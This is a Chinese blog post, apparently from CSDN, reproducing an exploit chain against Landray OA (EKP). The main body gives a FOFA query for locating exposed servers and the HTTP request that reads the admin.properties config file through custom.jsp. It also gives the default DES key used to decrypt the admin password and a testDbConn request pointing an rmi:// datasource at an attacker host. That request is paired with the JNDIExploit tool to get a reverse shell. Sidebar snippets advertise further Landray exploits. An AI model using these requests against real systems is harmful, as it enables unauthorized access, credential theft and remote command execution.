蓝凌OA SSRF+JNDI远程命令执行

最新推荐文章于 2024-06-24 09:40:03 发布
最新推荐文章于 2024-06-24 09:40:03 发布
阅读量4.2k 收藏 1
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44146996/article/details/116766246
版权

漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限

FOFA

app=“Landray-OA系统”

漏洞复现

利用蓝凌OA custom.jsp 任意文件读取漏洞读取配置文件
/WEB-INF/KmssConfig/admin.properties
发送请求包

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

在这里插入图片描述

获取password后,使用 DES方法 解密,默认密钥为 kmssAdminKey

在这里插入图片描述

访问后台地址
http://xxx.xxx.xxx.xxx/admin.do

使用解密到的密码登陆
在这里插入图片描述

使用工具反弹shell
https://github.com/feihong-cs/JNDIExploit/tags
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i [address]

运行工具监听端口->ping dnslog测试

POST /admin.do HTTP/1.1
Host: 
Cookie: JSESSIONID=90EA764774514A566C480E9726BB3D3F; Hm_lvt_9838edd365000f753ebfdc508bf832d3=1620456866; Hm_lpvt_9838edd365000f753ebfdc508bf832d3=1620459967
Content-Length: 70
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Origin: https://X.X.X.X
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

method=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:1099/dnslog

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

MD@@nr丫卡uer
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
蓝凌(Landray)OA漏洞常见RCE
heike_Ch的博客
05-09 905
背景是由于一次和友商共同的渗透项目测试中,其中一个系统使用了蓝凌OA,但当时由于一些原因觉得版本挺新应该是打了补丁的故在测试中没有仔细遍历复现蓝凌OA的历史常见RCE漏洞,后续对比了友商的报告发现别人测的两个RCE,故统一做个poc积累学习,混个眼熟防止下次渗透或攻防时漏掉。
X凌OA系统任意文件读取&SSRF+JNDI远程命令执行组合
thelostworld
05-14 1127
X凌OA系统任意文件读取-SSRF+JNDI远程命令执行一、漏洞描述深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,同时利用ssrf可远程命令执行。二、漏洞影响蓝凌OA三、利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件读取路径:/WEB-INF/KmssConfig/admin.properties读取文件:POC:POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: 127
1day 蓝凌OA EIS EKP 30多个漏洞合集(含payload利用)攻防必备漏洞
最新发布
weixin_43167326的博客
06-24 1837
蓝凌OA是一款全面的企业管理软件,以知识管理为核心,致力于提升组织产能。其特点在于高度自定义、易用性和灵活扩展性。通过自定义功能和流程,蓝凌OA能够满足企业的个性化需求。同时,简单的界面和操作方式使得员工能够快速上手使用。蓝凌OA还注重知识管理,提供知识模板和知识库等功能,方便员工进行知识分享和学习。此外,蓝凌OA还提供丰富的。
命令注入_JNDI注入远程命令执行
weixin_34897593的博客
01-08 3819
在2016年的BlackHat上,@pwntester分享了通过JNDI注入进行RCE利用的方法。JNDI注入利用方式比较简单。我们先看一下poc代码。首先在攻击机上部署恶意代码exp.class。exp.class放在http://127.0.0.1:8001/目录下,所以攻击机需要开启http服务和rmi服务。import java.io.IOException;import jav...
蓝凌标准产品V16.0管理员手册-RestService服务管理.pdf
05-25
蓝凌标准产品V16.0管理员手册-RestService服务管理.pdf
蓝凌OA漏洞复现
热门推荐
混子
12-13 2万+
又是学习漏洞的一天,老是能听到蓝凌OA爆发了什么,我就很蒙蔽,想问问旁边师傅,蓝凌是个什么,又怕师傅来句你连蓝凌都不知道,怪尴尬,索性还是靠自己把,今天复现蓝凌OA
蓝凌OA系统V15.0管理员手册.zip
07-08
蓝凌OA系统V15.0是一款针对企业日常办公自动化需求设计的高效管理工具,它为企业提供了一整套流程审批、文档管理、协同工作、信息门户等核心功能,旨在提升企业的办公效率,优化业务流程。作为系统管理员或运维人员...
蓝凌OA产品V14系统安装维护手册.chm
07-04
蓝凌OA产品V14系统安装维护手册.chm
蓝凌OA系统排名?蓝凌OA办公系统怎么选?什么是用户口碑最好的蓝凌OA系统?
04-13
提到OA选型,难免不会提到蓝凌蓝凌OA怎么样?蓝凌OA有哪些优缺点?蓝凌OA用户口碑怎么样? 想了解这些信息,您应该到选型宝,B2B的大众点评,看看用户对蓝凌OA产品的实名点评。 关于蓝凌OA,以下信息来自选型宝...
启动蓝凌OA项目的全步骤.md
07-11
公司用的oa项目的启动和初始化步骤。
蓝凌OA -V15.0管理员手册及用户操作手册
03-02
蓝凌OA是一款企业级的办公自动化(Office Automation)软件,主要目标是提升企业的管理效率,降低运营成本。V15.0版本是该系统的一个重要里程碑,提供了更加强大、稳定且易用的功能。本手册将针对管理员和普通用户两...
蓝凌OA系统任意文件读取
maverickpig的博客
05-26 3295
网络安全自学日志-漏洞复现篇:蓝凌OA系统任意文件读取&SSRF+JNDI远程命令执行组合 工作中遇到的漏洞,文章为自己复现做的相关笔记,参考了很多前人的资料,只是做个笔记。 标题一、漏洞描述 深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,同时可利用ssrf进行远程命令执行。 标题二、漏洞影响 蓝凌OA 标题三、任意文件读取复现 利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件 读取路径: /WEB-INF/KmssConfig/
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 602
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞。
蓝凌OA sysUiComponent 任意文件上传漏洞getshell(文末附批量检测poc)
安于心,修于形
12-26 1868
蓝凌OA sysUiComponent接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。
【1day】蓝凌OA 系统custom.jsp 接口远程命令执行漏洞学习
记录并分享学习安全的知识点..
12-05 665
蓝凌OA系统是一套企业级办公自动化软件解决方案。蓝凌OA系统提供了一系列功能模块,帮助企业实现高效的办公管理和协同工作。蓝凌OA 系统custom.jsp 接口存在远程命令执行漏洞,攻击者通过漏洞可以执行任意命令获取服务器权限。 ​
蓝凌OA漏洞分析与处置方案
不忘初心,护天下安全!
09-19 2819
蓝凌OA sysSearchMain.do文件 存在任意文件写入漏洞,攻击者获取后台权限后可通过漏洞写入任意文件,也可以通过 custom.jsp 文件未授权写入恶意文件蓝凌OAapp="Landray-OA系统"产品官网漏洞在method 为 editrParam。参数为 FdParameters,在 com.landray.kmss.sys.search.jar 中的 com.landray.kmss.sys.search.actions.SysSearchMainAction 类。
Java_OAexp工具设计及实现-Thelostworld_OA
thelostworld
05-02 3323
本文约1700字,阅读约需6分钟。本文主要介绍基于JavaFX图形化界面开发的快速OA类利用工具。笔者收集和整理了目前工具的OA类验证及其利用的方式和方法,整合成一个方便快捷图形化的快速利用工具。想要写这个工具的原因,主要是日常工作中,OA漏洞利用总是需要去找无数验证脚本,操作繁琐。为了方便日常渗透测试,简单快捷地进行OA利用渗透,方便团队提升效率,笔者撰写了这款工具。设计初期,笔者收集和查看了一些师傅所撰写的OA利用相关工具和文章,都是部分漏洞的利用和探测,比较单一。在这个情况下,笔者把现存披露的漏洞利用
蓝凌OA custom命令执行漏洞(含批量验证poc)
weixin_43567873的博客
04-18 319
蓝凌OA custom命令执行漏洞(含批量验证poc)
蓝凌OA SSRF漏洞
11-15
根据您提供的引用内容,我可以为您回答关于蓝凌OA SSRF漏洞的问题。 蓝凌OA是一款企业级办公自动化软件,由于其在设计上存在一些安全漏洞,因此被黑客利用进行攻击。其中,SSRF漏洞是蓝凌OA中的一种常见漏洞类型。SSRF漏洞是指攻击者可以通过构造恶意请求,使服务器发起对内部网络中其他服务的请求,从而实现攻击的目的。 具体来说,攻击者可以通过构造恶意请求,使蓝凌OA服务器向攻击者指定的URL地址发起请求,从而获取攻击者想要的信息。攻击者可以利用这个漏洞获取服务器内部的敏感信息,或者进一步利用该漏洞进行攻击。 为了防止蓝凌OA SSRF漏洞的攻击,建议管理员及时更新蓝凌OA的补丁,并对蓝凌OA进行安全加固。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值